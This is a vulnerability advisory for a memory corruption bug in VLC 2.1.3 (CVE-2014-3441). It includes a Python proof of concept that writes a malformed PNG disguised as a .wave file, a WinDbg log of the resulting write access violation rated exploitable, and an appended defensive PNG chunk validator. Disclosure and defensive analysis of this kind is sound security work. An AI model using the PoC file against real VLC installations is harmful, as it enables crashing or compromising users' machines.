VLC Player 2.1.3 Memory Corruption
Posted on 09 May 2014
# Exploit Title: [VLC player memory corruption in latest version 2.1.3]
# Date: [2014/05/07]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.videolan.org]
# Software Link: [ http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/ ]
# Version: [Version 2.1.3 and prior]
# Tested on: [Windows XP SP3 x86]
# CVE : [2014-3441]

details:

VLC player, latest version 2.1.3, suffers from a memory corruption vulnerability when a malformed .png file is loaded by codec\libpng_plugin.dll. The file extension can be changed to .wave (the PoC writes poc.wave); as the debugger log below shows, VLC still probes the file with demux\libimage_plugin.dll and loads codec\libpng_plugin.dll to decode it.

Poc:

#!/usr/bin/python
# Malformed PNG: IHDR width 0x7FFFFFFF, IDAT declared length 0x689201 (far longer than the file itself)
data = (b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84"
        b"\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66"
        b"\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82")
outfile = open("poc.wave", "wb")   # written with a .wave extension; VLC still sniffs it as an image
outfile.write(data)
outfile.close()
print("Created Poc")

windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00400000 00426000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000   C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000   C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000   C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000   C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:000> g
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 64fc0000 65008000   C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000   C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000   C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000   C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000   C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000   C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000   C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000   C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000   C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000   C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000   C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000   C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000   C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000   C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
ModLoad: 68e80000 6992e000   C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000   C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000   C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000   C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000   C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000   C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000   C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000   C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000   C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll - 
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab            rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable
!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll - 
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)
User mode write access violations that are not near NULL are exploitable.
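As an added defender-side example that is not part of the original advisory: a chunk-level PNG validator in Python that walks the PoC bytes above before any pixel decoding takes place. It carries the advisory's byte string as POC_PNG, reports the IHDR dimensions (0x7FFFFFFF x 258), the IDAT chunk whose declared length (6,853,121 bytes) far exceeds the 17 bytes that actually follow it, and the missing IEND, and accepts a constructed well-formed 1x1 PNG as a control. The pixel budget MAX_PIXELS, the function and class names, and the benign sample are assumptions of this example, not anything the advisory or VLC defines.

```python
import struct
import zlib
from dataclasses import dataclass, field
from typing import Iterator, List, Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Constructed pixel budget (assumption of this example): a decoder should refuse an
# image this large *before* allocating and clearing row buffers. 2**28 is arbitrary.
MAX_PIXELS = 1 << 28

# The bytes the advisory's PoC writes (same values, hex-encoded here).
POC_PNG = bytes.fromhex(
    "89504e470d0a1a0a"                                                    # PNG signature
    "0000000d" "49484452" "7fffffff" "00000102" "0103000000" "ba1bd884"   # IHDR: 0x7FFFFFFF x 258, depth 1, palette
    "00000003" "504c5445" "ffffff" "a7c41bc8"                             # PLTE: one entry
    "00000001" "74524e53" "00" "40e6d866"                                 # tRNS
    "00689201" "49444154" "ff053a926541716842"                            # IDAT: declares 6,853,121 bytes, 17 follow
    "49454e44" "ae426082"                                                 # IEND (swallowed by IDAT's bogus length)
)


@dataclass
class Chunk:
    ctype: str
    declared_len: int
    data: bytes              # what was actually present in the file
    crc_ok: Optional[bool]   # None when truncated: there is no CRC to check
    truncated: bool


@dataclass
class Audit:
    width: Optional[int] = None
    height: Optional[int] = None
    chunks: List[Chunk] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def iter_chunks(png: bytes) -> Iterator[Chunk]:
    """Walk the chunk stream without decoding anything; stop at the first chunk
    whose declared length runs past the end of the file."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG: bad signature")
    pos = 8
    while pos + 8 <= len(png):
        length, raw_type = struct.unpack(">I4s", png[pos:pos + 8])
        data_start = pos + 8
        available = len(png) - data_start            # bytes left for data + CRC
        truncated = length + 4 > available
        data = png[data_start:data_start + min(length, available)]
        crc_ok = None
        if not truncated:
            (crc,) = struct.unpack(">I", png[data_start + length:data_start + length + 4])
            crc_ok = (zlib.crc32(raw_type + data) & 0xFFFFFFFF) == crc   # PNG CRC covers type + data
        yield Chunk(raw_type.decode("ascii", "replace"), length, data, crc_ok, truncated)
        if truncated:
            return
        pos = data_start + length + 4


def audit_png(png: bytes, max_pixels: int = MAX_PIXELS) -> Audit:
    """Structural checks a decoder (or an upload filter) should apply before
    trusting IHDR dimensions or chunk lengths."""
    a = Audit()
    for ch in iter_chunks(png):
        a.chunks.append(ch)
        if ch.truncated:
            a.findings.append(f"{ch.ctype}: declared length {ch.declared_len} but only "
                              f"{len(ch.data)} bytes remain in the file")
        elif ch.crc_ok is False:
            a.findings.append(f"{ch.ctype}: CRC mismatch")
        if ch.ctype == "IHDR":
            if len(ch.data) != 13:
                a.findings.append(f"IHDR: length {len(ch.data)}, expected 13")
                continue
            w, h = struct.unpack(">II", ch.data[:8])
            a.width, a.height = w, h
            if w == 0 or h == 0 or w > 0x7FFFFFFF or h > 0x7FFFFFFF:
                a.findings.append(f"IHDR: {w}x{h} is outside the range the PNG spec allows")
            elif w * h > max_pixels:
                a.findings.append(f"IHDR: {w}x{h} = {w * h} pixels exceeds budget {max_pixels}; "
                                  "reject before allocating row buffers")
    if a.width is None:
        a.findings.append("IHDR missing")
    if not a.chunks or a.chunks[-1].ctype != "IEND" or a.chunks[-1].truncated:
        a.findings.append("stream is not terminated by a well-formed IEND chunk")
    return a


def _chunk(ctype: bytes, data: bytes) -> bytes:
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))


def make_tiny_png(width: int = 1, height: int = 1) -> bytes:
    """Constructed, well-formed 8-bit grayscale PNG used as the benign control."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = (b"\x00" + b"\x00" * width) * height        # filter byte 0 + zero pixels per row
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


if __name__ == "__main__":
    for name, blob in (("advisory PoC", POC_PNG), ("benign 1x1", make_tiny_png())):
        result = audit_png(blob)
        print(f"{name}: {result.width}x{result.height}, chunks={[c.ctype for c in result.chunks]}")
        for finding in result.findings:
            print("  -", finding)
```

The check that matters for the crash reported above is the one on IHDR: the debugger stops inside msvcrt!memset on a rep stos with edi at 018e5000, a write access violation, which is consistent with the decoder clearing a buffer sized from the header before the file has proven it can supply that much data. Validating every declared chunk length against the bytes actually present and capping width x height before allocation rejects this file within its first 33 bytes, and the 1x1 control shows the same checks pass a well-formed image untouched.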
